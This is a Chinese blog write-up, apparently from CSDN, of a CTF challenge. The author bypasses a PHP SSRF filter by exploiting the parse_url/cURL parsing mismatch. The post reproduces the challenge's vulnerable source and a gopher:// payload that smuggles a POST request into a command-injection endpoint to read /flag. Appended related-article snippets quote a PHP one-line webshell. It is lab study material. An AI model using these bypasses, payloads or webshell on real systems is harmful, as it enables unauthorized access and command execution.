一次失败的CTF尝试记录(SSRF利用)

最新推荐文章于 2025-02-10 11:31:01 发布
最新推荐文章于 2025-02-10 11:31:01 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: CTF 文章标签: 信息安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_38963246/article/details/109048930
版权

访问url,获取index.php代码如下:

 <?php
if(!(isset($_POST['url']))){
    show_source(__FILE__);
}
// include_once "ping.php";
if (isset($_POST['url'])) {
    $link = $_POST['url'];
    if(check($link)){
        $curlobj = curl_init();
        curl_setopt($curlobj, CURLOPT_POST, 0);
        curl_setopt($curlobj,CURLOPT_URL,$link);
        curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
        $result = curl_exec($curlobj);
        curl_close($curlobj);
        echo $result;
    }else{
        echo "unknown error";
    }

}

function check($url) {
    $url = parse_url($url);
    if(isset($url['port'])){    //rewrite url if port exist
        $url['path']= ':'.$url['port'].$url['path'];
    }
    if(isset($url['scheme'])){    # filter scheme
        if(strcasecmp($url['scheme'], "ftp") === 0 || strcasecmp($url['scheme'], "telnet") === 0 || strcasecmp($url['scheme'], "dict") === 0 || strcasecmp($url['scheme'], "file") === 0 || strcasecmp($url['scheme'], "ldap") === 0){
            return FALSE;
        }
    }
    $host = $url['host'];


    if(!preg_match('/[a-zA-Z]/', $host)){
        $ip = $host;
        if(is_inner_ip_regx($ip)){
            return FALSE;
        }
    }else{
        $ip = gethostbyname($host);
        if($ip ===$host){
            return FALSE;
        }
        if(is_inner_ip_regx($ip)){
            return FALSE;
        }
    }
    return TRUE;
}

function is_inner_ip_regx($ip){
    $pattern = "/^(127\.0\.0\.1)|(localhost)|(10\.\d{1,3}\.\d{1,3}\.\d{1,3})|(172\.((1[6-9])|(2\d)|(3[01]))\.\d{1,3}\.\d{1,3})|(192\.168\.\d{1,3}\.\d{1,3})$/";
    if(preg_match($pattern, $ip)){
        return TRUE;
    }else{
        return FALSE;
    }
}

直接访问ping.php,需要localhost访问
在这里插入图片描述
本以为是修改XFF字段或者其他的代理字段,试了:X-Forwarded-For,X-real-ip,发现都不行。然后看index.php的代码,首先需要check为真才能curl访问。首先要确保url是内网IP,但是内网的话check是false,很鬼扯。

仔细看下代码,逻辑上是绕不过去的,本以为还是绕过正则的,试了IPV6绕过[::1],后续在本地搭环境是可以绕过的,代码也没报错,check()为真了,但是在实际测试中却是没有内容,失望+1。
在这里插入图片描述
后续转移思路了,看到了parse_url(),baidu了two thousand years later…
终于发现这个是可以通过构造:http://foo@localhost:80@114.114.114.114/ping.php这样的构造绕过。

<?php
echo "test";
// include_once "ping.php";
$link = "http://foo@localhost:80@114.114.114.114/test.txt";
if(check($link)){
    $curlobj = curl_init();
    curl_setopt($curlobj, CURLOPT_POST, 0);
    curl_setopt($curlobj,CURLOPT_URL,$link);
    echo "link->",$link,"\n";
    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($curlobj);
    curl_close($curlobj);
    echo "result->",$result,"\n";
}else{
    echo "unknown error";
}

function check($url) {
    $url = parse_url($url);
    echo "\n----------------\n";
    echo "port->",$url['port'],"\n";
    echo "host1->",$url['host'],"\n";
    echo "scheme->",$url['scheme'],"\n";
    echo "path0->",$url['path'],"\n";
    //http://[ :: ]:10007/ping.php
    if(isset($url['port'])){    //rewrite url if port exist
        $url['path']= ':'.$url['port'].$url['path'];
        echo "path1->",$url['path'],"\n";
    }
    if(isset($url['scheme'])){    # filter scheme
        if(strcasecmp($url['scheme'], "ftp") === 0 || strcasecmp($url['scheme'], "telnet") === 0 || strcasecmp($url['scheme'], "dict") === 0 || strcasecmp($url['scheme'], "file") === 0 || strcasecmp($url['scheme'], "ldap") === 0){
            echo  "scheme false\n";
            return FALSE;
        }
    }
    $host = $url['host'];


    if(!preg_match('/[a-zA-Z]/', $host)){//host是数字组成的
        $ip = $host; 
        echo "ip->",$ip,"\n";
        if(is_inner_ip_regx($ip)){//判断是不是内网ip
            echo  "ip false1\n";
            return FALSE;
        }
    }else{
        $ip = gethostbyname($host);//是域名的话解析为IP
        echo "ip->",$ip,"\n";
        if($ip ===$host){
            echo "ip=host false\n";
            return FALSE;
        }
        if(is_inner_ip_regx($ip)){
            echo  "ip false2\n";
            return FALSE;
        }
    }
    return TRUE;
}

function is_inner_ip_regx($ip){
    $pattern = "/^(127\.0\.0\.1)|(localhost)|(10\.\d{1,3}\.\d{1,3}\.\d{1,3})|(172\.((1[6-9])|(2\d)|(3[01]))\.\d{1,3}\.\d{1,3})|(192\.168\.\d{1,3}\.\d{1,3})$/";
    if(preg_match($pattern, $ip)){
        return TRUE;
    }else{
        return FALSE;
    }
} 

?>

测试下输出结果为:
在这里插入图片描述
parse_url()解析的$ip不是内网IP,是114.114.114.114
cURL解析的$link却是localhost
如下图所示:
在这里插入图片描述
又试了two thousand years later…,因为中间构造了http://foo@localhost:10007@114.114.114.114/ping.php,重点是端口不对,这个坑爬了很久,获取了ping.php源码如下:

<?php

$remote_ip = $_SERVER['REMOTE_ADDR'];
if($remote_ip !== "127.0.0.1") {
    echo "Can only be accessed on localhost";
    exit();
}
show_source(__FILE__);
extract($_POST); //获取POST请求体中的参数数据
$ip = $ip ? $ip : "127.0.0.1";


$ip = myescapeshellarg($ip);
$cmd = "ping -c 1 $ip";
system($cmd);

function myescapeshellarg($data){
    $data = str_replace("\"","\\\"", $data);
    $data = str_replace("'","\\'", $data);
    $data = str_replace(";","", $data);
    $data = str_replace("|","", $data);
    $data = str_replace("&","", $data);
    $data = str_replace(" ","", $data);
    $data = "\"$data\"";
    return $data;
}

一看不就是命令截断+注入么,被他娘的胜利冲昏了头,赶紧构造url=HTTP://foo@localhost:80@114.114.114.114/ping.php&ip=www.baidu.com,试试截断%0a,%0d,${IFS},试了two thousand years later…,不成功,还是ping的127.0.0.1
在这里插入图片描述
仔细想想,瞬间就傻了,我POST请求的就是ping.php,而ping.php中又要传递参数$ip去实现命令注入,相当于两个POST,一次发包怎么办得到,用&ip这种连接显然是错误的。下一步应该是看看CURL协议,毕竟有个scheme过滤,准备去吃个饭回来继续看,发现大佬已经把答案公布了,一阵抽搐之后一切都索然无味了。

url=gopher://u:p@127.0.0.1:80@baidu.com/_POST+/ping.php+HTTP/1.1%250d%250aHost%3a+127.0.0.1%3a80%250d%250aConnection%3a+close%250d%250aContent-Type%3a+application/x-www-form-urlencoded%250d%250aContent-Length%3a+52%250d%250a%250d%250aip=%255c%2522%2509%250a%250acat${IFS}/flag%2509%250a

URL解码之后:

url=gopher://u:p@127.0.0.1:80@baidu.com/_POST /ping.php HTTP/1.1
Host: 127.0.0.1:80
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

ip=\"	

cat${IFS}/flag

一次次的不成功,尝试都在磨灭自己的耐心,不断地鼓励自己坚持,最后差一点点的却公布答案了,这感觉太TM不爽了,不爽归不爽,还是因为,撸起袖子加油干哦
在这里插入图片描述

服务器请求伪造漏洞(SSRF)及失效的访问控制漏洞
2401_83164661的博客
03-11 930
本文章主要用于分享SSRF及失效的访问控制漏洞基础学习请大家结合参考其他文章中的相关信息进行归纳和补充。 通过portswigger靶场加深学习体会。
bugku ctf 程序员本地网站(请从本地访问)
qq_42777804的博客
08-01 1万+
打开网站之后 使用burp抓包 修改添加Client-ip: 127.0.0.1 (相当于从本地访问哈哈哈) forward即可
SSRF的详解、复现与CTF下的SSRF
sGanYu
12-11 6722
借鉴于教父爱分享 SSRF 由攻击者构造,服务器端发起请求的安全漏洞,漏洞属于信息泄露的一种。 一般情况下,SSRF的攻击目标大多是网站的内部系统(正因为请求是由服务器端发起的,所以服务器能请求到与自身相连而与外网隔离的内部系统),只要当前服务器有向其他服务器发送请求的地方都可能存在SSRF漏洞。 SSRF形成的原因 大多数都是由服务端提供了从其他服务器应用获取数据的操作,且没有对目标地址做过滤与限制,比如从指定URL地址获取网页文本内容,加载指定地址的图片文档等等 举个例子:假设现在有两个网站
Bugku CTF web12(Web)
ChaoYue_miku的博客
02-23 1158
0、打开网页,发现需要输入用户名和密码 用户名使用admin 密码可以爆破得到,也可以查看注释 将dGVzdDEyMw==进行base64解码得到密码:test123 1、输入用户名和密码 无法登录,提示只有本地管理员可以访问,由此考虑到使用xff方法修改IP为本地地址 2、使用BurpSuite抓包 3、添加:X-Forwarded-For: 127.0.0.1后发送 4、得到flag:flag{9876894a5ec96ef77b6d54ba5cd983bf.
CTFSSRF常见绕过
qq_42383069的博客
04-24 2653
ip进制转换:https://tool.520101.com/wangluo/jinzhizhuanhuan。当程序中限制了我们使用localhost和127.0.0.1时,便可以利用进制转换来绕过。进制转换:https://www.sojson.com/hexconvert.html。
ctf刷题记录
enhengzZ的博客
04-23 1582
基础认证题 页面中依据提示 可猜测用户为admin 可弱口令尝试(admin)------失败 暴脾气,,,词典爆破! 下载其页面提供的词典 抓包处对上图circle处进行解密 在burp的decode模板中进行查询可知其加密方式为base64 载入词典 此处开始走弯路:1.词典所加载的均为密码,缺少用户名(发现问题后,度娘学习正则表达式,很好,又学了个奇奇怪怪的姿势)2.词典爆破后一直都是401返回,长度均为404,没有出现200返回(原因未明) ----------------------------
2024Dragon Knight CTF复现web
2301_80913334的博客
05-31 1408
可以看到注册的用户lin(在注册界面尝试时注册的)已经被放入cookie中,token的值是用md5加密的用户名,is_admin是判断用户是否为admin为0时登入则会显示“you are not admin!Fuzz:Fuzz是一种基于黑盒的自动化软件模糊测试技术,简单的说一种懒惰且暴力的技术融合了常见的以及精心构建的数据文本进行网站、软件安全性测试。通过提示我们可以得知可能需要参数爆破,但是发现页面为图片,bp抓包也没发现能够爆破的位置。发现并没有第二层的回显猜测有可能是_划线被禁用了,用[绕过。
CTFHub-web详解
shayebudon的博客
11-20 3647
信息泄露 目录遍历 遍历每一个文件夹,找到flag.txt,复制内容提交 PHPINFO 打开页面,从信息中寻找flag。 备份文件下载 网站源码 尝试各种组合,最后发现在网站后添加www.zip后成功下载压缩文件 将解压后的文件名放在url后,即可出现flag bak文件 下载index.php.bak打开即可看到flag vim缓存 当开发人员在线上环境中使用 vim 编辑器,在使用过程中会留下 vim 编辑器缓存,当vim异常退出时,缓存...
vulhub复现记录
书山有路勤为径,学海无涯苦作舟
10-16 1988
看作者下面的解释可以知道,自 2022 年 2 月起,作为 Docker Compose V2023 的子命令合并到 Docker 中,Python 版本的将在 年 月之后弃用。但是由于我之前在CentOS搭建了老的docker,所以就继续使用,老的docker-compose.其中遇到不少坑,就浅浅的记录一下吧。
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7846
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
Jarvis-OJ-Web writeup
a370793934的专栏
11-28 1208
PORT51 访问了页面发现让你 Please use port 51 to visit this site. 明显是绑定的端口,不可能用51端口去访问啊,很困惑结果是自己去访问的时候需要用到51端口啊…原来如此,使用curl中的–local-port命令 --local-port <端口号>[-num]设置连接使用的首选端口号或本地端口范围。请注意,端口号是一种稀缺资源,繁忙...
CTFHub技能树 Web-SSRF 内网访问
Senimo
07-01 484
CTFHub技能树 Web-SSRF 内网访问 hint:尝试访问位于127.0.0.1的flag.php吧 启动环境,访问页面为空白,查看URL: http://challenge-25917a94dca3ca9a.sandbox.ctfhub.com:10800/?url=_ 其中存在 GET 方式的传参:url=_,将127.0.0.1/flag.php地址填入尝试访问: http://challenge-25917a94dca3ca9a.sandbox.ctfhub.com:10800/?url=
ctfhub--web--SSRF(1.内网访问2.伪协议读取文件 3.端口扫描 4.POST请求 5.文件上传 8.URL Bypass 9.数字IP Bypass) )
feiniaotjx的博客
10-10 654
ctfhub--web--SSRF1.内网访问2.伪协议读取文件3.端口扫描4.POST请求 1.内网访问 传参给url,访问一个地址文件 2.伪协议读取文件 读取网站文件 3.端口扫描 通过返回的内容判断端口是否存在 import requests try: for i in range(8000,9001): url='http://challenge-43493ad3b38edf3f.sandbox.ctfhub.com:10800/?url=127.0.0.1:'+
CTF-WEB总结(三)
weixin_41038905的博客
05-03 1083
Php一句话木马: <?php eval($_post['cmd']); ?> 一句话:<?php eval($_post['cmd']);?> 代码执行函数 eval,assert,preg_replace, array_map等 命令执行函数 system,exec, passthru 等 根据waf白名单拼接字符串 ?c=$pi=(is_nan^(6).(...
ctfphpml.php,Bytectf-几道web总结
weixin_39929877的博客
04-14 444
1.EZcms这道题思路挺明确,给了源码,考点就是md5哈希扩展+phar反序列化首先这道题会在上传的文件目录下生成无效的.htaccess,从而导致无法执行上传的webshell,所以就需要想办法删除掉.htaccess这里主要记录一点,利用php内置类进行文件操作,exp为:class File{public $filename;public $filepath;public $checker...
2025版最新CTF选手必藏的50个实战解题思路,零基础入门到精通,收藏这篇就够了
最新发布
喜欢Python编程的程序员柚柚呀
02-10 862
•:快速拆解问题(Flag导向)、工具链协作、模式化思维。•:先广度后深度(优先收集信息)、分治策略(拆解复杂任务)。• 使用混淆SQL语句(MySQL特性)。• 利用代替明文字符串。• Flask/Jinja2中通过获取危险类。• Twig模板使用执行命令。• PHP伪协议读取POST原始数据,写入Webshell。• 利用logrotate日志文件包含(如泄露路径)。• 修改Header中alg为none(需删除签名字段)。• 通过读取系统文件。。gopher://• PHP利用或。
php parse url ctf,一道CTF题目的探究
weixin_33907300的博客
04-14 1475
ByteCTF上遇到的一道Web题目,Boring_Code输出了代码:function is_valid_url($url) {if (filter_var($url, FILTER_VALIDATE_URL)) {if (preg_match('/data:\/\//i', $url)) {return false;}return true;}return false;}if (isset($...
CTF 中的 PHP 漏洞利用总结
热门推荐
重新启程
10-12 2万+
基础知识 系统变量(超全局变量) 在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据,是一个字典 $_GET // 获取 get 数据,是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...
ctf hub的ssrf的文件上传
01-14
### 关于CTF Hub中的SSRF漏洞与文件上传问题 #### SSRF漏洞概述 服务器端请求伪造(Server-Side Request Forgery, SSRF)是一种攻击方式,允许攻击者通过被入侵的应用程序向内部网络或其他受信任的服务发送HTTP请求。这种类型的攻击可以用来访问不应该公开的信息或服务。 对于带有回显的SSRF漏洞,当应用程序返回来自远程资源的数据给客户端时发生;而对于不带回显的情况,则是指应用执行了恶意构造的URL但并未直接反馈结果给用户[^1]。 #### 文件上传安全措施 为了防止利用文件上传机制实施各种形式的安全威胁,包括但不限于脚本注入、命令执行等风险,在设计实现过程中应当采取如下策略: - **严格验证文件扩展名**:采用白名单而非黑名单的方式过滤允许上传的文件类型。 - **校验MIME类型**:不仅依赖浏览器提供的`Content-Type`头信息,还应该基于实际内容来判断文件的真实性质。 - **设定合理的尺寸上限**:限制单个文件的最大体积以及整个提交批次所能占用的空间总量。 - **随机重命名保存路径**:避免原文件名称可能带来的安全隐患,并确保不同用户的资料不会相互覆盖。 - **隔离存储位置**:将上载物品存放在独立目录下,远离Web根目录结构之外,必要时可启用额外的身份认证环节控制读取权限[^2]. ```php // PHP代码片段展示如何安全处理文件上传 if ($_FILES['file']['error'] === UPLOAD_ERR_OK) { $tmp_name = $_FILES["file"]["tmp_name"]; $name = basename($_FILES["file"]["name"]); // 只接受特定几种图片格式 $allowed_extensions = ['jpg', 'jpeg', 'png']; $extension = pathinfo($name, PATHINFO_EXTENSION); if (in_array(strtolower($extension), $allowed_extensions)) { // 验证mime-type $finfo = new finfo(FILEINFO_MIME_TYPE); $real_mime = $finfo->file($tmp_name); $valid_mimes = ["image/jpeg", "image/png"]; if (in_array($real_mime, $valid_mimes)) { // 设置最大文件大小为2MB define('MAX_FILE_SIZE', 2 * 1024 * 1024); // bytes if ($_FILES['file']['size'] <= MAX_FILE_SIZE) { // 使用唯一标识符作为新文件名并移动到指定位置 move_uploaded_file( $tmp_name, "/path/to/safe/location/" . uniqid() . '.' . strtolower($extension) ); } } } } ``` 针对CTF竞赛环境下的具体案例分析,通常会涉及到模拟真实世界中存在的缺陷场景供参赛选手破解学习。例如AWD模式下的题目可能会故意留下某些配置不当之处以便测试团队成员能否识别并修复这些问题[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值